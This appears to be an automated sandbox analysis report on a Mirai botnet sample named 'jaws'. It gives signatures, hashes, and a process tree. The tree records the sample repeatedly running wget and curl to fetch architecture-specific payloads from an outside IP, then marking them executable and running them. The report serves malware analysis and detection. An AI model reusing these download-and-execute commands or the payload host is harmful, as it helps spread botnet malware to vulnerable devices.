Analysis

  • max time kernel
    149s
  • max time network
    152s
  • platform
    debian-9_mips
  • resource
    debian9-mipsbe-20240611-en
  • resource tags

    arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
  • submitted
    30-08-2024 05:17

General

  • Target

    jaws

  • Size

    3KB

  • MD5

    4429a8d8a1c145c7f2135f7b93910618

  • SHA1

    f4a829f7fe5f475e1fc63661218303e41779de65

  • SHA256

    5f146a25218b14546812329e55b5d4b8b0e4b1caf182e4681295efa2d461b0cf

  • SHA512

    5c486e279036afbf60f6c1737141f9613f748bc8b2f6f493b10b7e69556f6df4cb2fe8c2f20846bba5ac46337bc08109cb9f0e81db7ff267a2aed2242c0affc5

Malware Config

Extracted

Family

mirai

Botnet

UNSTABLE

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

  • Contacts a large (145784) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Executes dropped EXE 13 IoCs
  • Modifies Watchdog functionality 1 TTPs 2 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

  • UPX packed file 5 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Writes file to system bin folder 1 TTPs 2 IoCs
  • Changes its process name 1 IoCs
  • Reads runtime system information 57 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 23 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/jaws
    /tmp/jaws
    1⤵
    • Writes file to tmp directory
    PID:709
    • /usr/bin/wget
      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.x86
      2⤵
      • Writes file to tmp directory
      PID:712
    • /usr/bin/curl
      curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.x86
      2⤵
      • Reads runtime system information
      • Writes file to tmp directory
      PID:730
    • /bin/cat
      cat h0r0zx00x.x86
      2⤵
        PID:736
      • /bin/chmod
        chmod +x h0r0zx00x.x86 hiroz3x jaws systemd-private-fe66a10cb8c94298a27e1d2548bd5aa3-systemd-timedated.service-keJfQc
        2⤵
          PID:737
        • /tmp/hiroz3x
          ./hiroz3x jaws.exploit
          2⤵
          • Executes dropped EXE
          PID:739
        • /usr/bin/wget
          wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips
          2⤵
          • Writes file to tmp directory
          PID:741
        • /usr/bin/curl
          curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips
          2⤵
          • Reads runtime system information
          • Writes file to tmp directory
          PID:742
        • /bin/cat
          cat h0r0zx00x.mips
          2⤵
            PID:743
          • /bin/chmod
            chmod +x h0r0zx00x.mips h0r0zx00x.x86 hiroz3x jaws systemd-private-fe66a10cb8c94298a27e1d2548bd5aa3-systemd-timedated.service-keJfQc
            2⤵
              PID:744
            • /tmp/hiroz3x
              ./hiroz3x jaws.exploit
              2⤵
              • Executes dropped EXE
              • Modifies Watchdog functionality
              • Writes file to system bin folder
              • Changes its process name
              • Reads runtime system information
              PID:745
            • /usr/bin/wget
              wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mpsl
              2⤵
              • Writes file to tmp directory
              PID:748
            • /usr/bin/curl
              curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mpsl
              2⤵
              • Reads runtime system information
              • Writes file to tmp directory
              PID:753
            • /bin/cat
              cat h0r0zx00x.mpsl
              2⤵
                PID:754
              • /bin/chmod
                chmod +x h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-fe66a10cb8c94298a27e1d2548bd5aa3-systemd-timedated.service-keJfQc
                2⤵
                  PID:755
                • /tmp/hiroz3x
                  ./hiroz3x jaws.exploit
                  2⤵
                  • Executes dropped EXE
                  PID:756
                • /usr/bin/wget
                  wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm
                  2⤵
                  • Writes file to tmp directory
                  PID:758
                • /usr/bin/curl
                  curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm
                  2⤵
                  • Reads runtime system information
                  • Writes file to tmp directory
                  PID:759
                • /bin/cat
                  cat h0r0zx00x.arm
                  2⤵
                    PID:767
                  • /bin/chmod
                    chmod +x h0r0zx00x.arm h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-fe66a10cb8c94298a27e1d2548bd5aa3-systemd-timedated.service-keJfQc
                    2⤵
                      PID:769
                    • /tmp/hiroz3x
                      ./hiroz3x jaws.exploit
                      2⤵
                      • Executes dropped EXE
                      PID:770
                    • /usr/bin/wget
                      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm5
                      2⤵
                      • Writes file to tmp directory
                      PID:773
                    • /usr/bin/curl
                      curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm5
                      2⤵
                      • Reads runtime system information
                      • Writes file to tmp directory
                      PID:780
                    • /bin/cat
                      cat h0r0zx00x.arm5
                      2⤵
                        PID:788
                      • /bin/chmod
                        chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-fe66a10cb8c94298a27e1d2548bd5aa3-systemd-timedated.service-keJfQc
                        2⤵
                          PID:789
                        • /tmp/hiroz3x
                          ./hiroz3x jaws.exploit
                          2⤵
                          • Executes dropped EXE
                          PID:791
                        • /usr/bin/wget
                          wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm6
                          2⤵
                          • Writes file to tmp directory
                          PID:794
                        • /usr/bin/curl
                          curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm6
                          2⤵
                          • Reads runtime system information
                          • Writes file to tmp directory
                          PID:803
                        • /bin/cat
                          cat h0r0zx00x.arm6
                          2⤵
                            PID:813
                          • /bin/chmod
                            chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-fe66a10cb8c94298a27e1d2548bd5aa3-systemd-timedated.service-keJfQc
                            2⤵
                              PID:814
                            • /tmp/hiroz3x
                              ./hiroz3x jaws.exploit
                              2⤵
                              • Executes dropped EXE
                              PID:816
                            • /usr/bin/wget
                              wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm7
                              2⤵
                              • Writes file to tmp directory
                              PID:819
                            • /usr/bin/curl
                              curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arm7
                              2⤵
                              • Reads runtime system information
                              • Writes file to tmp directory
                              PID:822
                            • /bin/cat
                              cat h0r0zx00x.arm7
                              2⤵
                                PID:823
                              • /bin/chmod
                                chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.x86 hiroz3x jaws systemd-private-fe66a10cb8c94298a27e1d2548bd5aa3-systemd-timedated.service-keJfQc
                                2⤵
                                  PID:824
                                • /tmp/hiroz3x
                                  ./hiroz3x jaws.exploit
                                  2⤵
                                  • Executes dropped EXE
                                  PID:825
                                • /usr/bin/wget
                                  wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.ppc
                                  2⤵
                                  • Writes file to tmp directory
                                  PID:827
                                • /usr/bin/curl
                                  curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.ppc
                                  2⤵
                                  • Reads runtime system information
                                  • Writes file to tmp directory
                                  PID:828
                                • /bin/cat
                                  cat h0r0zx00x.ppc
                                  2⤵
                                    PID:829
                                  • /bin/chmod
                                    chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.x86 hiroz3x jaws systemd-private-fe66a10cb8c94298a27e1d2548bd5aa3-systemd-timedated.service-keJfQc
                                    2⤵
                                      PID:830
                                    • /tmp/hiroz3x
                                      ./hiroz3x jaws.exploit
                                      2⤵
                                      • Executes dropped EXE
                                      PID:831
                                    • /usr/bin/wget
                                      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.m68k
                                      2⤵
                                        PID:833
                                      • /usr/bin/curl
                                        curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.m68k
                                        2⤵
                                        • Reads runtime system information
                                        • Writes file to tmp directory
                                        PID:834
                                      • /bin/cat
                                        cat h0r0zx00x.m68k
                                        2⤵
                                          PID:835
                                        • /bin/chmod
                                          chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.x86 hiroz3x jaws systemd-private-fe66a10cb8c94298a27e1d2548bd5aa3-systemd-timedated.service-keJfQc
                                          2⤵
                                            PID:836
                                          • /tmp/hiroz3x
                                            ./hiroz3x jaws.exploit
                                            2⤵
                                            • Executes dropped EXE
                                            PID:837
                                          • /usr/bin/wget
                                            wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.spc
                                            2⤵
                                              PID:838
                                            • /usr/bin/curl
                                              curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.spc
                                              2⤵
                                              • Reads runtime system information
                                              • Writes file to tmp directory
                                              PID:860
                                            • /bin/cat
                                              cat h0r0zx00x.spc
                                              2⤵
                                                PID:871
                                              • /bin/chmod
                                                chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws
                                                2⤵
                                                  PID:872
                                                • /tmp/hiroz3x
                                                  ./hiroz3x jaws.exploit
                                                  2⤵
                                                  • Executes dropped EXE
                                                  PID:873
                                                • /usr/bin/wget
                                                  wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.i686
                                                  2⤵
                                                  • Writes file to tmp directory
                                                  PID:876
                                                • /usr/bin/curl
                                                  curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.i686
                                                  2⤵
                                                  • Reads runtime system information
                                                  • Writes file to tmp directory
                                                  PID:877
                                                • /bin/cat
                                                  cat h0r0zx00x.i686
                                                  2⤵
                                                    PID:878
                                                  • /bin/chmod
                                                    chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.i686 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws
                                                    2⤵
                                                      PID:879
                                                    • /tmp/hiroz3x
                                                      ./hiroz3x jaws.exploit
                                                      2⤵
                                                      • Executes dropped EXE
                                                      PID:880
                                                    • /usr/bin/wget
                                                      wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.sh4
                                                      2⤵
                                                        PID:882
                                                      • /usr/bin/curl
                                                        curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.sh4
                                                        2⤵
                                                        • Reads runtime system information
                                                        • Writes file to tmp directory
                                                        PID:883
                                                      • /bin/cat
                                                        cat h0r0zx00x.sh4
                                                        2⤵
                                                          PID:884
                                                        • /bin/chmod
                                                          chmod +x h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.i686 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.sh4 h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws
                                                          2⤵
                                                            PID:885
                                                          • /tmp/hiroz3x
                                                            ./hiroz3x jaws.exploit
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:886
                                                          • /usr/bin/wget
                                                            wget http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arc
                                                            2⤵
                                                              PID:887
                                                            • /usr/bin/curl
                                                              curl -O http://45.145.165.64/h0r0zx00xh0r0zx00xdefault/h0r0zx00x.arc
                                                              2⤵
                                                              • Reads runtime system information
                                                              • Writes file to tmp directory
                                                              PID:888
                                                            • /bin/cat
                                                              cat h0r0zx00x.arc
                                                              2⤵
                                                                PID:889
                                                              • /bin/chmod
                                                                chmod +x h0r0zx00x.arc h0r0zx00x.arm h0r0zx00x.arm5 h0r0zx00x.arm6 h0r0zx00x.arm7 h0r0zx00x.i686 h0r0zx00x.m68k h0r0zx00x.mips h0r0zx00x.mpsl h0r0zx00x.ppc h0r0zx00x.sh4 h0r0zx00x.spc h0r0zx00x.x86 hiroz3x jaws
                                                                2⤵
                                                                  PID:890
                                                                • /tmp/hiroz3x
                                                                  ./hiroz3x jaws.exploit
                                                                  2⤵
                                                                  • Executes dropped EXE
                                                                  PID:891

                                                              Network

                                                              MITRE ATT&CK Enterprise v15

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • /tmp/h0r0zx00x.x86

                                                                Filesize

                                                                30KB

                                                                MD5

                                                                01b5ca96006efd6ecba70995ac395db5

                                                                SHA1

                                                                c077939743bbdc1906b9cbd291e9e3c15b2ed613

                                                                SHA256

                                                                e68a0410f0139792d1c821e2d577323eb034b2a030dfc5d8cc8b6215c2a933ec

                                                                SHA512

                                                                7cbd89a82ab3ed0ed257cfbbb6a85b27d7a8e7af08c436a5d7104969e23269ad905d8551a1144116b950308daebc90f3515002aadcf65bff754e045714bbec44

                                                              • /tmp/hiroz3x

                                                                Filesize

                                                                32KB

                                                                MD5

                                                                37942437a545b634350c1b0b80d8371f

                                                                SHA1

                                                                deac7b16e9b9e718cc21de900f8e2e78ec6b41a7

                                                                SHA256

                                                                805d483543b0940b25147f18257251a4c24ad857c65bb1286f9f794fa1643bbd

                                                                SHA512

                                                                ba8cbe1e6744b2c6e5136ed739725988410ec0c259cfd89281b0c87c3bc4b3dd3fd15b2541a23953348a5305373f3fdbc02491ebaa6a64a8264d20f19f064fa0

                                                              • /tmp/hiroz3x

                                                                Filesize

                                                                33KB

                                                                MD5

                                                                7e03a4fa6e42aa482775fe8fc656eb29

                                                                SHA1

                                                                68c1aec948d144ec9a2befedaeea0007b96bf8cf

                                                                SHA256

                                                                f78f0bd098b133e70ee11e717bcb53430bc23c499942087473044d5dabe2ca01

                                                                SHA512

                                                                3ba610f23ec82d6c6804e21b2625fa963e7187a9e750a16372154b3bb40743042dab1248c676b638ecc3db4d608bf19193f66a848e69e3a70a2076f084f2d2e2

                                                              • /tmp/hiroz3x

                                                                Filesize

                                                                31KB

                                                                MD5

                                                                4568999226a40c97956934d7f3b623ed

                                                                SHA1

                                                                58cdfc30ccf6a12dec1dd929cbf3ceecece43d42

                                                                SHA256

                                                                96abb7f10850173a8c7b4583e49d092a51d53c9bf863aca9162f14a934e7548e

                                                                SHA512

                                                                77f728e4fa5a8c6fdcbbf6c34ea4987e4c1912da8bfd060d1dc7e639a0415f923984fca3079a87ee792d5e5817bddfeb9be02eda45c9d4c870a4c9de2e6e07c6

                                                              • /tmp/hiroz3x

                                                                Filesize

                                                                27KB

                                                                MD5

                                                                f5129e69c2a10c4ff4ff731d42ee5bed

                                                                SHA1

                                                                a975cfe7e1e8c66b592d6e33c99a288738243980

                                                                SHA256

                                                                7128b3640bac18912378cff5bfbead8a0ff169ef0dfd7ad9c16f79aa3d08ae4a

                                                                SHA512

                                                                3fe57d032eed36553f39b99ca42ba77e30010626e9789a583eab3a417f13fa329a2479b3f2854b518a3a59098887e37f4e184c331539d72046925ad3afdead70

                                                              • /tmp/hiroz3x

                                                                Filesize

                                                                54KB

                                                                MD5

                                                                8b19337d006d6fdc4e59c330efdaf6f9

                                                                SHA1

                                                                e65b4fe930c51c7b56418cf9f713350524ee0f88

                                                                SHA256

                                                                f0353e4f5b1447dbe82d3c056cb3701ad53473e4901fe79a7b42f20425f1c080

                                                                SHA512

                                                                a86486b02b5c7e68dbe2f33364d75e208ede183cbc53ec0161d09444216f2d539305ae24fa58f9af41d2a0bc036da2023836e6db40f13ccc79d6cdf40067f888